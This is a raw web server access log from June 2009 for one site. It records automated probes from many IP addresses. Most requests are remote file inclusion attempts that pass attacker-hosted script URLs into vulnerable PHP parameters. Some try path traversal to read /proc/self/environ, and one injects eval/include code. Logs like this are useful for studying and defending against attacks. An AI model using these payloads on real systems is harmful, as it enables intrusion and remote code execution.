72.44.187.42 - - [29/Jun/2009:08:17:47 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:21:04 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:21:04 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:21:04 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:21:12 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:21:12 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:21:12 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.18.98.186 - - [29/Jun/2009:08:22:34 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:23:11 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:23:11 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:23:11 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:23:18 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:23:18 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:23:18 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "vspeaking.com"
125.131.116.12 - - [29/Jun/2009:08:25:05 -0700] "GET /logs/index2.php?x=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:08:25:05 -0700] "GET /index2.php?x=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:08:25:05 -0700] "GET /logs/access.log%20%20/index2.php?x=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:25:26 -0700] "GET /logs/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:25:26 -0700] "GET /logs/access.log%20%20/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:25:26 -0700] "GET /das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:08:25:38 -0700] "GET /logs/access.log/index2.php?x=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:08:25:38 -0700] "GET /logs/index2.php?x=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:08:25:39 -0700] "GET /index2.php?x=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:25:39 -0700] "GET /das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:25:39 -0700] "GET /logs/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:25:39 -0700] "GET /logs/access.log%20%20/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:27:58 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:27:58 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:27:58 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:28:00 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:28:01 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:28:01 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:28:06 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:28:06 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:28:06 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:08:29:56 -0700] "GET /logs/access_090112.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
220.232.247.197 - - [29/Jun/2009:08:29:59 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
220.232.247.197 - - [29/Jun/2009:08:30:05 -0700] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
220.232.247.197 - - [29/Jun/2009:08:30:05 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:30:40 -0700] "GET /include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:30:40 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:30:40 -0700] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:30:43 -0700] "GET /include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:30:43 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:30:43 -0700] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:34:17 -0700] "GET /include/bbs.lib.inc.php?site_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:34:17 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:34:17 -0700] "GET /logs/access_090413.log//include/bbs.lib.inc.php?site_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
125.131.116.12 - - [29/Jun/2009:08:35:44 -0700] "GET /logs/access_090112.log%20%20/index2.php?x=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:35:56 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:38:11 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:38:41 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
79.8.85.135 - - [29/Jun/2009:08:38:58 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
79.8.85.135 - - [29/Jun/2009:08:38:58 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
79.8.85.135 - - [29/Jun/2009:08:38:58 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:39:05 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [29/Jun/2009:08:41:07 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:42:10 -0700] "GET /logs//header.php?base_folder=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:42:10 -0700] "GET /logs/access.log%20%20//header.php?base_folder=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:42:10 -0700] "GET /header.php?base_folder=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.44.187.42 - - [29/Jun/2009:08:42:39 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [29/Jun/2009:08:42:49 -0700] "GET /logs/access_090413.log//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:08:44:38 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:08:44:38 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:08:44:38 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:45:36 -0700] "GET /logs/access.log//header.php?base_folder=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
79.8.85.135 - - [29/Jun/2009:08:47:02 -0700] "GET /logs/access_090413.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.88.49.6 - - [29/Jun/2009:08:47:09 -0700] "GET /addevent.inc.php?agendax_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.88.49.6 - - [29/Jun/2009:08:47:09 -0700] "GET /logs/addevent.inc.php?agendax_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.88.49.6 - - [29/Jun/2009:08:47:10 -0700] "GET /logs/access_090413.log/addevent.inc.php?agendax_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.93.48.103 - - [29/Jun/2009:08:47:55 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
216.97.225.120 - - [29/Jun/2009:08:48:40 -0700] "GET /logs/access_090413.log//header.php?base_folder=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:49:30 -0700] "GET /logs/access_090413.log/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:49:30 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:49:30 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "www.vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:49:38 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "www.vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:49:38 -0700] "GET /logs/access_090413.log/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.51.241.6 - - [29/Jun/2009:08:49:38 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [29/Jun/2009:08:49:44 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [29/Jun/2009:08:49:44 -0700] "GET /logs/scripts.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [29/Jun/2009:08:49:44 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:24 -0700] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:25 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:25 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:08:51:25 -0700] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:08:52:24 -0700] "GET /logs//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:08:52:24 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.186.128.233 - - [29/Jun/2009:08:52:24 -0700] "GET /include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.11.230.36 - - [29/Jun/2009:08:55:21 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.11.230.36 - - [29/Jun/2009:08:55:21 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:08:55:52 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:08:56:11 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:08:56:11 -0700] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:08:56:11 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.188.129.126 - - [29/Jun/2009:08:56:33 -0700] "GET /logs/access_090413.log/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.188.129.126 - - [29/Jun/2009:08:56:33 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
89.188.129.126 - - [29/Jun/2009:08:56:33 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "www.vspeaking.com"
72.82.228.83 - - [29/Jun/2009:08:58:30 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:59:15 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:59:15 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:59:15 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:59:23 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:59:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:08:59:23 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
